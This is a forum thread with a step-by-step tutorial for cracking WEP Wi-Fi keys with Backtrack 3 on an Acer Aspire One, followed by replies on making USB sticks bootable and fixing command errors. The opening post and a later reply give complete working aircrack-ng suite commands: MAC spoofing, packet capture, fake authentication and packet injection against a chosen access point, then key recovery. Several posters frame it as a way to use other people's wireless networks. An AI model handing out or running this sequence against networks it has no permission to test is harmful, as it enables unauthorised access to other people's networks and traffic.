Use Backtrack 3 on a USB stick to crack WEP

Okay, brace yourselves for a tutorial on Clientless WEP-cracking on the Aspire One, using Backtrack 3 installed on a USB stick.

-Hit F12 while booting to access the boot menu, and select your USB drive.
-Select VESA KDE as your graphics mode.
-When the desktop shows up, open a Terminal and enter the following commands:

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0


At this point, it will display the networks available, as well as the encryption on them, etc.

Pick a network using WEP encryption, and with sufficient power (>15). From now on, the channel number of the AP your are attempting to crack = [chan#], its BSSID = [ap bssid], and the name of your dump file (it can be anything) = [dumpname].

airodump-ng -c [chan#] -w [dumpname] --bssid [ap bssid] ath0

Open another terminal.

aireplay-ng -1 0 -a [ap bssid] -h 00:11:22:33:44:55 ath0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap bssid] -h 00:11:22:33:44:55 ath0


Open another terminal.
When the data on your capture reaches at least 5000, execute this command:
aircrack-ng [dumpname.cap]

Congrats. You've got your key. A reminder though, that it may take a ton of data (60,000+) to crack some networks without a client.

 

Hi,

I've got a problem when using Backtrack 3 in AAO: when I type "airmon -ng" in the terminal I obtain the following message: "-bash: airmon: command not found". The same happens if I type "aircrack" or "airodump".

My Linux and hacking knowledge is absolutely zero, and I don't know if I'm doing anything wrong, or if I should do something else previous to typing "airmon", maybe change the path or something like that?

I have seen several videos in Youtube in which they just open a terminal, type "airmon -ng" and it works perfectly, although they probably aren't using an AAO. For instance this one:


My system specifications: Acer Aspire One, 1 GHz CPU, 1 GB RAM, 120 GB HDD, Windows XP SP2 installed in the HDD, Backtrack 3 installed in a 2 GB USB booting in VESA KDE.

When I choose "Start - Internet - Wireless Adapter" Backtrack finds many WLANs, so it's not a problem of having the Wifi switched off.

I hope that you can help me. Thanks in advance.

Yours,
AAOfan

 

hello again,

I've found the solution to my problem. It's quite embarrasing to explain: when typing "airmon-ng" I used to place a space between "airmon" and "-ng".

Sorry for posting such a silly message, if the Moderator reads this I would thank him if he could delete it.

Happy WEP-cracking !!

AAOFan

Mod Edit: I have read your 2 posts, and have them to be helpful. Deleting these will not be needed.
-DiSK

 

I'm to lazy to boot my bt3 atm, but does it have wesside-ng installed?

 

I'm having problems with step one. How do I boot from the usb drive with bt3 on it? I have the iso on the usb drive and have even decompressed it on there and then tried to boot from it by pressing f12 when the bootup screen comes up... but nothing. How do I get past step one?

 

You probably need to use unetbootin-linux. Read this page, it might give you the guidance you need ...

http://news.softpedia.com/news/How-to-R ... 3316.shtml

Essentially you'll have the iso file and unetbootin-linux. You run the latter like so:

./unetbootin-linux

Then select the ISO you want to burn and the flash key you want to "burn" it on.

Cheers.

 

There are instructions on the bt3 wiki on how to create a bootable usb.

Basically you extract the iso onto the usb and run the bootinst.sh (or bootinst.bat if you're in windows) in the boot directory on the usb stick. At least I remember it being called bootinst. It's something like that.

 

It's like soleblaze described it.

I used the one called "bt3final_usb.iso" from BT.
Mount it and copy the folders 'boot' and 'BT3' to the usb stick.
Then navigate in terminal into the boot folder on the usb stick and execute a script to make the stick bootable.
"Bootinst.sh" for linux/OSX, "bootinst.bat" for windows.
I tried in OSX but the script found errors, then tried in windows and it worked, forgot about the Aspire

These are the instructions I followed: http://wiki.remote-exploit.org/index.ph ... _USB_stick

When you boot up from the stick you get a menu to choose graphics mode, I chose VESA KDE. You can press TAB to pause, if not, it continues after 3 seconds. Next thing is a question about "video mode", I didn't chose, after a while it continues anyway.

Next thing you're on the desktop, I took this screenshot: http://img231.imageshack.us/my.php?image=bt3td1.jpg
The light for the wireless doesn't work btw.
When you turn off the computer and remove the usb stick, the aspire will start up next time in good old linpus (if thats what you had before)

 

I have got BT3 working from a USB stick with my Atheros . How do I get it to see my external USB Wifi card instead of my built in Atheros card.

Thanks

ss30

 

I got BT3 running from my USB stick but it doesn't find any networks. I find that very strange because my router (with wep encryption) is just 3 feet away...

Any advice for a linux noob?

 

Never mind, got it running now

Dunno why it didn't work the first time. Rebooted and everything worked great, so far I have only cracked my own network but it's the only wep network in the neighbourhood.

Guess I'm gonna change to WPA-PSK encryption instead...

 

hi, i followed the guide but cant get bt3 to catch any IVs (dont really know what IVs are but i just got 1 of em ) then it says something about retrying the cracking when i get 5000 IVs, any1 have any ideas on what im doing wrong?


thnx in advance
//Johan

 

Double-check that the command aireplay is working, maybe the user use Mac Filtering and will not work like that.

 

i think its working as it should... dont get any error messages at least but i cant see how many IVs i capture anywhere, think that can have something to do with it?


i followed another tutorial where they changed a little in step 7 and the last step and now im getting around 600 IVs(still dont know what that is though ). but that aint enough and i dont know what i should do to get anymore IVs. no matter how long i leave it running it just wont crack the key:S
//johan

 

No offence, but if you guys can't follow this tutorial, then maybe you should stick to paying for your wifi.
As a side note, BT3F doesn't come with wesside-ng installed, and I believe it isn't really needed anyway, it's kind of a newb tool.
If you want wesside-ng then google how to install it, or upgrade to BT4B.

 

im trying to crack my own key and how are you supposed to learn stuff if you dont ask and nothing youve read about work?

 

Well in the case of cracking wep with backtrack using the aspire one, your argument is invalid.
This should work for everyone.
If it doesn't you're doing something wrong.
And doing something wrong with steps as clear as these is only do-able by complete and total newbs.
And if you were interested in this instead of being a skiddie then you might know that if your network is using wep without a MAC filter you're an idiot. (No offence)
end of rant.

 

lol, noone forced you to answer :mrgreen: but i really dont know what im doing wrong, if i just knew that i might try to fix it right?

 

Pot calling the kettle black. Your an idiot for thinking a MAC filter is any more security.

 

until a few days ago, i had never looked at cracking WEP. and its only been a few weeks that i have been learning linux..I have read all sorts of guides on cracking WEP, but this one so has has been the most straight forward.

one point to make tho... in the part below...

Code:

Open another terminal.

aireplay-ng -1 0 -a [ap bssid] -h 00:11:22:33:44:55 ath0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap bssid] -h 00:11:22:33:44:55 ath0

change it to

Code:

aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap bssid] -h 00:11:22:33:44:55 ath0

What would help you all that is having problems would be to read the manuals for aircrack and try to understand what each command your giving is actually doing. and that is the problem that gets a lot of people annoyed, when people just come along and ask, 'how do i .....' and expect people who have years of IT skills to hand over, in a nicely packaged step by step, foolproof guide, that knowledge for free.... usually, when someone does a little research and can ask an intelligent question or at least shows understanding in the subject, the response of the guru's is a little more forth coming.

I am sure some people want a package where they can just press a button, and hey presto, they are connected to the neighbors wifi...And thats where the problems begin.... the fools will screw about with stuff and all that nonsense, next thing its all in the newspapers, then everyone will move to more secure networks, then nobody will be able to check the email when your out and about !!!